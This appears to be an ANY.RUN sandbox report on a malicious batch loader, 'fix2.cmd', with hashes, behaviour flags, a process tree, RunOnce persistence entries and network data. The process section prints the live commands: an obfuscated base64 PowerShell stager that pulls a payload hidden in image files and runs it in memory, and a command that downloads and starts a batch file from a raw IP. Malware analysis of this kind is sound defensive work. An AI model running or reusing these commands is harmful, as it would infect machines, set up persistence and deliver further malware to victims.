File name: fix2.cmd

Full analysis: https://app.any.run/tasks/b7fda0f0-cd80-40dc-9ad7-ed11fb5bc499
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 03, 2025, 16:10:34
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
reverseloader
ta558
apt
payload
stegocampaign
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: 161BECAD962E2351D74D9921EDE038FC
SHA1: 7726CCD45126A9F0BE73CA5EEB33254A66161B3E
SHA256: 8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
SSDEEP: 24:0sTDggIOggIOt6WB3wQC5glm3wQ9F5gl4enGSb9+G5BavFkhtyPR7zErrCBVYJOz:JD8LjWB9Calm9Xal4qGSp1kKHyPRvh7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 2028)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • cmd.exe (PID: 6356)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 3620)
    • Starts process via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 6812)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6296)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
    • Application launched itself

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 3620)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 2028)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 6356)
    • Removes files via Powershell

      • powershell.exe (PID: 3396)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
    • Checks proxy server information

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
      • slui.exe (PID: 1324)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • conhost.exe (PID: 7008)
      • conhost.exe (PID: 4012)
      • powershell.exe (PID: 6808)
      • conhost.exe (PID: 1324)
      • conhost.exe (PID: 2432)
      • powershell.exe (PID: 5368)
      • conhost.exe (PID: 1508)
      • conhost.exe (PID: 5876)
      • powershell.exe (PID: 4312)
      • conhost.exe (PID: 5548)
      • conhost.exe (PID: 1488)
      • conhost.exe (PID: 7060)
      • conhost.exe (PID: 1644)
      • powershell.exe (PID: 2028)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 3396)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Creates files in the program directory

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Manual execution by a user

      • cmd.exe (PID: 6356)
    • Returns all items recursively from all subfolders (POWERSHELL)

      • powershell.exe (PID: 3396)
    • Reads the software policy settings

      • slui.exe (PID: 1324)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 191
Monitored processes: 58
Malicious processes: 18
Suspicious processes: 0

Behavior graph (interactive process tree, see the full report)

Process information

PID: 304
CMD: timeout /t 5
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
504powershell -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhAG0AIAAoAFsAd@wB0AHIAaQBuAGd@AWwBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEd@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4AIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACAAIAAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQAZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBpAC4AaQBiAGIALgBjAG8ALwA3AGQAYgBHAEsAdwBYAFoALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkALAAgACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBiAGkAdABiAHUAYwBrAGUAdAAuAG8Ad@gBnAC8AaABnAGYAZABmAHMAZgAvAGoAawByADQALwByAGEAdwAvADYAZABkAGUAMAAwADAAMAA4ADkAMAA1ADgAMwAyADAANQA5AGIAYQAzAGQAOAA2AGYAOQBhAGIAOQAzADIANwA3ADEAMwBhADQAZAA5ADUALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkAKQA7AAoAIAAgACAAIAAgACAAIA
AgACAAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAd@gBvAG0ATABpAG4AawBzACAAJABsAGkAbgBrAHMAOwAKACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGd@AZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAd@gBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAd@wApADsACgAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACd@APAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGd@AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAd@wB0AGEAd@gB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsACgAgACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAKQA7AAoAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAd@gB0AF0AOgA6AEYAd@gBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGd@AKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZ
QB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAd@wBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AAoAIAAgACAAIAAgACAAIAAgADEALgAuADIAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAFMAdABhAHIAdAAtAFMAbABlAGUAd@AAgADEAIAB9ACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkALgBHAGUAdABUAHkAd@ABlACgAJwB0AGUAd@wB0AHAAbwB3AGUAd@gBzAGgAZQBsAGwALgBIAG8AYQBhAGEAYQBhAGEAd@wBkAG0AZQAnACkAOwAKACAAIAAgACAAIAAgACAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB0AGEAd@gB0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAZQBjACAAPQAgACd@AUgBlAGd@AQQBzAG0AJwA7AAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAd@ABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAGwAZgBzAGd@AZQBkAGQAZABkAGQAZABkAGEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACd@AdAB4AHQALgA4ADUAMgA3AF8AOAA4ADQANgA4ADQANgA1ADd@AMQBfAGQAYQBvAGwAeQBhAHAALwBuAGkAYQBtAC8AdwBhAHIALwB0AG8AbABwAGUAd@gAvAHQAeQB0AGkAdQBpAGIAbgAvAGd@Ad@gBvAC4AdABlAGsAYwB1AGIAdABpAGIALwAvADoAd@wAnACwAIAAnADEAJwAsACAAJwBXAGkAbgBkAG8AdwBzAFUAd@ABkAGEAdABlACd@ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgAOAA2ACd@AKQApAH0AfQA7AAoA'';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($sofigo.replace(''d@'',''c'')));iex $OWjuxD\"'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1100
CMD: powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1180
CMD: powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1244
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\WindowsUpdate1.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1324
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1324
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 1336
CMD: powershell -Command "Invoke-WebRequest -Uri 'http://206.82.9.203/WindowsUpdate.bat' -OutFile 'C:\Users\admin\WindowsUpdate1.bat' -UseBasicParsing; Start-Process -FilePath 'C:\Users\admin\WindowsUpdate1.bat' -Wait"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1488
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1508
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 131 009
Read events: 131 005
Write events: 4
Delete events: 0

Modification events

(PID) Process: (6664) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation: write
Name: eFfcofbcfd
Value: C:\ProgramData\WindowsUpdate.bat

(PID) Process: (6836) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation: write
Name: FFliFmAeAo
Value: C:\ProgramData\SystemService.bat

(PID) Process: (5968) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation: write
Name: cAieSjmhdi
Value: C:\ProgramData\WindowsUpdate.bat

(PID) Process: (3620) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation: write
Name: koAmokFfij
Value: C:\ProgramData\SystemService.bat
Executable files: 0
Suspicious files: 1
Text files: 59
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5m4gor5k.u1w.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6664 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_voqn5dpe.opo.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4832 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3hozw5za.ik5.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zowu11nk.fwl.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4768 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vwdsv3ju.rel.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4768 | powershell.exe | C:\ProgramData\WindowsUpdate.bat | text
MD5: 161BECAD962E2351D74D9921EDE038FC
SHA256: 8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
7040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qwbuqxo4.lhn.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qi4tipus.znk.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6664 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qesi5vdq.3na.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a2ygdvwz.4hk.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 49
TCP/UDP connections: 50
DNS requests: 18
Threats: 14

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
